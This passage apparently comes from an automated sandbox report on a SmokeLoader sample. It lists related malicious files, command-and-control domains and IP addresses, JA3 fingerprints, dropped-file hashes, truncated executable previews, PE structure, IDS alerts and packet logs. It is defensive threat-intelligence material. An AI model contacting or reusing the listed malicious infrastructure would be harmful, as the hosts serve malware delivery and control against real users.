                              8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                  Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                                    uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                      y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                                        SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                                          WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
                                            file.exeGet hashmaliciousSmokeLoaderBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              mussangroup.comfile.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                              • 185.149.100.242
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.149.100.242
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.149.100.242
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.149.100.242
                                              Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.149.100.242
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.149.100.242
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.149.100.242
                                              fvI01ZBE1b.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.149.100.242
                                              II0MvEwlPf.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.149.100.242
                                              hH5mo7aGIf.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                              • 185.149.100.242
                                              gebeus.rufile.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 211.181.24.133
                                              file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                              • 190.224.203.37
                                              cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 186.145.236.93
                                              8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 217.219.131.81
                                              8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 187.199.228.245
                                              rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 189.232.42.250
                                              rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 196.189.156.245

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              POWERVIS-AS-KRLGPOWERCOMMKRLT7aP8OSZ3.elfGet hashmaliciousUnknownBrowse
                                              • 125.179.7.74
                                              OC7nZiO3Be.elfGet hashmaliciousMiraiBrowse
                                              • 182.230.86.56
                                              Pn0jlaHvxE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 112.149.221.4
                                              1gx339YsKN.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 112.155.118.67
                                              ts2d2a5oFa.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 112.158.248.139
                                              http://15.235.203.214/bolonetwork.x86Get hashmaliciousUnknownBrowse
                                              • 182.214.195.240
                                              92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 49.173.185.197
                                              92.249.48.47-skid.x86-2024-07-20T09_04_17.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 112.155.118.72
                                              arm7.elfGet hashmaliciousMiraiBrowse
                                              • 112.156.109.129
                                              cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 58.151.148.90
                                              SKB-ASSKBroadbandCoLtdKRJQwxK8VmE7.elfGet hashmaliciousUnknownBrowse
                                              • 211.177.159.153
                                              BeI1uexfjo.elfGet hashmaliciousUnknownBrowse
                                              • 211.210.145.112
                                              jBOlW3hwun.elfGet hashmaliciousMiraiBrowse
                                              • 219.250.90.57
                                              7OFBdUtXsK.elfGet hashmaliciousMiraiBrowse
                                              • 211.109.80.32
                                              KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                              • 211.52.178.90
                                              yLoLnA3XkD.elfGet hashmaliciousMiraiBrowse
                                              • 118.218.216.12
                                              5xUAAMwlnJ.elfGet hashmaliciousUnknownBrowse
                                              • 58.121.102.43
                                              arm7.elfGet hashmaliciousMiraiBrowse
                                              • 114.200.184.181
                                              Suav289vuI.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 116.126.234.131
                                              Pn0jlaHvxE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 39.113.253.226
                                              INFOBOX-ASInfoboxruAutonomousSystemRUTkeeN4qh4z.exeGet hashmaliciousRHADAMANTHYSBrowse
                                              • 109.120.176.41
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 77.221.157.163
                                              file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                              • 77.221.157.163
                                              cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 77.221.157.163
                                              8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 77.221.157.163
                                              rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 77.221.157.163
                                              rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 77.221.157.163
                                              Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 77.221.157.163
                                              NY2mig4fQh.exeGet hashmaliciousCryptOne, RHADAMANTHYSBrowse
                                              • 77.221.154.49
                                              uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 77.221.157.163
                                              AS-COLOCROSSINGUSTystnendes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 104.168.83.112
                                              Ref_7021929821US20240709031221650.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 104.168.83.112
                                              PG_320_MPI STEELPROCESS SRL_20240607_100526.xlsGet hashmaliciousRemcosBrowse
                                              • 198.46.176.133
                                              8Wa6XVNGUN.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 192.227.190.158
                                              gRxTdvGDCV.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 192.227.190.158
                                              C1VEb9QvYX.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 192.227.190.158
                                              u4ZRLSdu9f.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 192.227.190.158
                                              CSrnw4L6fz.elfGet hashmaliciousUnknownBrowse
                                              • 107.172.220.139
                                              D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                              • 198.46.176.133
                                              y3Bn3D8pOT.rtfGet hashmaliciousUnknownBrowse
                                              • 198.46.176.133
                                              AS-COLOCROSSINGUSTystnendes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 104.168.83.112
                                              Ref_7021929821US20240709031221650.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 104.168.83.112
                                              PG_320_MPI STEELPROCESS SRL_20240607_100526.xlsGet hashmaliciousRemcosBrowse
                                              • 198.46.176.133
                                              8Wa6XVNGUN.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 192.227.190.158
                                              gRxTdvGDCV.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 192.227.190.158
                                              C1VEb9QvYX.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 192.227.190.158
                                              u4ZRLSdu9f.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 192.227.190.158
                                              CSrnw4L6fz.elfGet hashmaliciousUnknownBrowse
                                              • 107.172.220.139
                                              D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                              • 198.46.176.133
                                              y3Bn3D8pOT.rtfGet hashmaliciousUnknownBrowse
                                              • 198.46.176.133

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              a6c95ef2da5b759f65c60665167952eefile.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 107.173.160.139
                                              • 107.173.160.137
                                              • 167.235.128.153
                                              a0e9f5d64349fb13191bc781f81f42e1B2lQl9Iy3w.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                              • 185.149.100.242
                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                                              • 185.149.100.242
                                              giupload.exeGet hashmaliciousLummaCBrowse
                                              • 185.149.100.242
                                              giupload.exeGet hashmaliciousLummaCBrowse
                                              • 185.149.100.242
                                              o7BAd23f4N.exeGet hashmaliciousLummaCBrowse
                                              • 185.149.100.242
                                              uYnTXVroee.exeGet hashmaliciousLummaCBrowse
                                              • 185.149.100.242
                                              2YlzBRvuV4.exeGet hashmaliciousLummaCBrowse
                                              • 185.149.100.242
                                              sDyXn4g8OD.exeGet hashmaliciousLummaCBrowse
                                              • 185.149.100.242
                                              Ud7SBAcvSW.exeGet hashmaliciousLummaCBrowse
                                              • 185.149.100.242
                                              FusionLoader v2.1.exeGet hashmaliciousUnknownBrowse
                                              • 185.149.100.242

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                              Download File
                                              Process:C:\Windows\explorer.exe
                                              File Type:JSON data
                                              Category:modified
                                              Size (bytes):1022
                                              Entropy (8bit):5.252542495586483
                                              Encrypted:false
                                              SSDEEP:24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
                                              MD5:2F99BED9FF8C41AFEE96B028ED8B86A2
                                              SHA1:BF4E91361EE28C5506E812F2BF8C3495676097B0
                                              SHA-256:F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
                                              SHA-512:834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,

                                              C:\Users\user\AppData\Local\Temp\C9F5.exe

                                              Download File
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):988672
                                              Entropy (8bit):7.331838963074561
                                              Encrypted:false
                                              SSDEEP:24576:0GRnx275QAJByPBIA/7oWw7XNyTvvvsjPhWm+2sGb6aYU8XFUiUBJRR7VFrQSgds:0GRna2EByPBIA/7oWw7XNyTvvUbhl+2j
                                              MD5:2B3ECC21382E825D6FE0812A717717EB
                                              SHA1:F3386531F7726A4F673003BF6CB5806843B76FFB
                                              SHA-256:AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
                                              SHA-512:7C1BF7F216861E435E71EAED6F9FF44A8453833C17896E661174B7616A9C25C7DA21AD4F8687FE00F39380C7A2BEBB854C3D7F47EED14021781CCDFC65DCB7C0
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...lZA..........."..........\.......Z.........@.............................p............`.........................................x...D....................................`..X....................................................................................text............................... ..`.rdata...P.......L..................@..@.data....0... ......................@....CRT.........P......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\ajjwvsd

                                              Download File
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):155648
                                              Entropy (8bit):6.734975340826263
                                              Encrypted:false
                                              SSDEEP:3072:BPfLv9CAlRi9gEj5scaFYcPn5I858ioma:tLv9f+/mtCiK
                                              MD5:D76C718ADA43477786EF9CA3BBA29842
                                              SHA1:C64677DDCE626F7B343EE2AEE0DEB369DD21E0DF
                                              SHA-256:EFA03AC97D2BF5C0020AE8D90CD2977BECCCA38FE5394D77A4A5482A8190E4EE
                                              SHA-512:F1AEBE693AB40FE2B5A3238BB9976395FBC2AA2A211A52DDCA5A2D8C568062ED82CAC07AAB04523831838415547D0286EE2F42DAD733524651715F211C0F8B4C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 39%
                                              • Antivirus: Virustotal, Detection: 41%, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6..yX..yX..yX.f6..yX..+..yX..+..yX..+..yX...#..yX..yY..yX..+..yX..+..yX..+..yX.Rich.yX.........................PE..L......d.................p..........W.............@.................................I.......................................,...<.......x...............................................................................T............................text....n.......p.................. ..`.rdata........... ...t..............@..@.data...."..........................@....toxol..............................@..@.gifex..............................@....rsrc...x...........................@..@........................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\ajjwvsd:Zone.Identifier

                                              Download File
                                              Process:C:\Windows\explorer.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.734975340826263
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.53%
                                              • InstallShield setup (43055/19) 0.43%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:file.exe
                                              File size:155'648 bytes
                                              MD5:d76c718ada43477786ef9ca3bba29842
                                              SHA1:c64677ddce626f7b343ee2aee0deb369dd21e0df
                                              SHA256:efa03ac97d2bf5c0020ae8d90cd2977beccca38fe5394d77a4a5482a8190e4ee
                                              SHA512:f1aebe693ab40fe2b5a3238bb9976395fbc2aa2a211a52ddca5a2d8c568062ed82cac07aab04523831838415547d0286ee2f42dad733524651715f211c0f8b4c
                                              SSDEEP:3072:BPfLv9CAlRi9gEj5scaFYcPn5I858ioma:tLv9f+/mtCiK
                                              TLSH:09E3AD117E90C032CC1A43766A29CAB52629BC70DBB5858F7B95FF5FDE332A04626347
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6..yX..yX..yX.f6...yX..+...yX..+...yX..+...yX...#..yX..yY..yX..+...yX..+...yX..+...yX.Rich.yX.........................PE..L..

                                              File Icon

                                              Icon Hash:cb97394d5555599a

                                              Static PE Info

                                              General

                                              Entrypoint:0x401557
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x64C40AC3 [Fri Jul 28 18:36:51 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:5d80776960e8ce41e325ecce5b0a696b

                                              Entrypoint Preview

                                              Instruction
                                              call 00007F0658D95375h
                                              jmp 00007F0658D91A9Eh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 00000328h
                                              mov dword ptr [0041B818h], eax
                                              mov dword ptr [0041B814h], ecx
                                              mov dword ptr [0041B810h], edx
                                              mov dword ptr [0041B80Ch], ebx
                                              mov dword ptr [0041B808h], esi
                                              mov dword ptr [0041B804h], edi
                                              mov word ptr [0041B830h], ss
                                              mov word ptr [0041B824h], cs
                                              mov word ptr [0041B800h], ds
                                              mov word ptr [0041B7FCh], es
                                              mov word ptr [0041B7F8h], fs
                                              mov word ptr [0041B7F4h], gs
                                              pushfd
                                              pop dword ptr [0041B828h]
                                              mov eax, dword ptr [ebp+00h]
                                              mov dword ptr [0041B81Ch], eax
                                              mov eax, dword ptr [ebp+04h]
                                              mov dword ptr [0041B820h], eax
                                              lea eax, dword ptr [ebp+08h]
                                              mov dword ptr [0041B82Ch], eax
                                              mov eax, dword ptr [ebp-00000320h]
                                              mov dword ptr [0041B768h], 00010001h
                                              mov eax, dword ptr [0041B820h]
                                              mov dword ptr [0041B71Ch], eax
                                              mov dword ptr [0041B710h], C0000409h
                                              mov dword ptr [0041B714h], 00000001h
                                              mov eax, dword ptr [0041A004h]
                                              mov dword ptr [ebp-00000328h], eax
                                              mov eax, dword ptr [0041A008h]
                                              mov dword ptr [ebp-00000324h], eax
                                              call dword ptr [0000007Ch]

                                              Rich Headers

                                              Programming Language:
                                              • [C++] VS2008 build 21022
                                              • [ASM] VS2008 build 21022
                                              • [ C ] VS2008 build 21022
                                              • [IMP] VS2005 build 50727
                                              • [RES] VS2008 build 21022
                                              • [LNK] VS2008 build 21022

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1982c0x3c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2f0000xa678.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x180000x154.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x16ea60x17000e03dda7211827112453d9e60d0894099False0.7982443104619565data7.472017406032608IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x180000x1fce0x2000b6b0ba04c22c164b3dc7426687c3a265False0.3658447265625data5.549029273072478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x1a0000x122800x1e0063f8d19fabcf1e387a691eec69d51ae6False0.11901041666666666data1.3263806802099802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .toxol0x2d0000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .gifex0x2e0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x2f0000xa6780xa800da7ab1e273c6f2f11e63e7d2ab9ae2d9False0.5080450148809523data5.494737382446083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              DUKUPIREYAFEHO0x35ce80xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6010447273914463
                                              RT_CURSOR0x369100x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                              RT_CURSOR0x36a580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                              RT_CURSOR0x36b880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                              RT_ICON0x2f4b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.6092750533049041
                                              RT_ICON0x303580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6904332129963899
                                              RT_ICON0x30c000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7482718894009217
                                              RT_ICON0x312c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7861271676300579
                                              RT_ICON0x318300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5853734439834025
                                              RT_ICON0x33dd80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.7157598499061913
                                              RT_ICON0x34e800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.7315573770491803
                                              RT_ICON0x358080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8705673758865248
                                              RT_STRING0x393180x15adata0.5028901734104047
                                              RT_STRING0x394780x1d0data0.521551724137931
                                              RT_STRING0x396480x2adata0.5952380952380952
                                              RT_ACCELERATOR0x368e00x30data0.9583333333333334
                                              RT_GROUP_CURSOR0x36a400x14data1.15
                                              RT_GROUP_CURSOR0x391300x22data1.088235294117647
                                              RT_GROUP_ICON0x35c700x76dataTurkishTurkey0.6610169491525424
                                              RT_VERSION0x391580x1bcdata0.5788288288288288

                                              Imports

                                              DLLImport
                                              KERNEL32.dllOpenJobObjectA, InterlockedDecrement, ZombifyActCtx, FreeEnvironmentStringsA, GetModuleHandleW, LoadLibraryW, Sleep, SetVolumeMountPointA, WriteConsoleW, GetAtomNameW, SetUnhandledExceptionFilter, GetLastError, GetProcAddress, LoadLibraryA, OpenWaitableTimerW, LocalAlloc, GetCommMask, CreateWaitableTimerW, EnumDateFormatsW, FindFirstVolumeA, AreFileApisANSI, GetConsoleAliasesW, GetNumaProcessorNode, HeapFree, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, FlushFileBuffers, CreateFileA, CloseHandle
                                              ADVAPI32.dllReadEventLogW

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              TurkishTurkey

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                              2024-07-23T06:16:16.946127+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile4972780192.168.2.564.190.113.113

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 23, 2024 06:15:31.200078964 CEST4971080192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:31.205148935 CEST804971058.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:31.205391884 CEST4971080192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:31.205391884 CEST4971080192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:31.205391884 CEST4971080192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:31.210674047 CEST804971058.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:31.210702896 CEST804971058.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:32.761040926 CEST804971058.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:32.765340090 CEST804971058.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:32.765475988 CEST4971080192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:32.765908957 CEST4971080192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:32.769937992 CEST4971180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:32.770884991 CEST804971058.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:32.775396109 CEST804971158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:32.775631905 CEST4971180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:32.775747061 CEST4971180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:32.775774956 CEST4971180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:32.790657043 CEST804971158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:32.790843964 CEST804971158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:34.276123047 CEST804971158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:34.278548956 CEST804971158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:34.278613091 CEST4971180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:34.278681040 CEST4971180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:34.281548023 CEST4971280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:34.283539057 CEST804971158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:34.286523104 CEST804971258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:34.286597013 CEST4971280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:34.286669016 CEST4971280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:34.286686897 CEST4971280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:15:34.293719053 CEST804971258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:34.293730021 CEST804971258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:35.836056948 CEST804971258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:15:35.836183071 CEST804971258.151.148.90192.168.2.5
